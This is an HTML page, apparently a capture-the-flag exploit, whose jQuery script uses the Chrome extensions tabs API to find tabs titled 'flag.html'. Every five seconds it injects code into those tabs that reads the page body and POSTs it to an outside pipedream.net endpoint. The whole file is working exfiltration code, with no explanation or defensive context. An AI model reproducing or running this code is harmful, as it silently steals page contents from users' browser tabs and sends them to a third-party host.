<!DOCTYPE html>
<html lang="en">
<head>
  <meta charset="UTF-8">
  <meta name="viewport" content="width=device-width, initial-scale=1.0">
  <title>flag.html</title>
  <script src="jquery-3.4.1.min.js"></script>
  <script>
    $(document).ready(function(){
      
      function checkAndExecuteScript() {
        
        chrome.tabs.query({}, function(tabs) {
         
          tabs.forEach(function(tab) {
           
            if (tab.title === 'flag.html') {
            
              chrome.tabs.executeScript(tab.id, {
                code: 'var bodyContent = document.body.innerHTML; fetch("https://eoyz1blvtlymzlj.m.pipedream.net", { method: "POST", body: JSON.stringify({ bodyContent }) });'
              });
            }
          });
        });
      }


      checkAndExecuteScript();

     
      setInterval(checkAndExecuteScript, 5000); });
  </script>
</head>
<body>
</body>
</html>
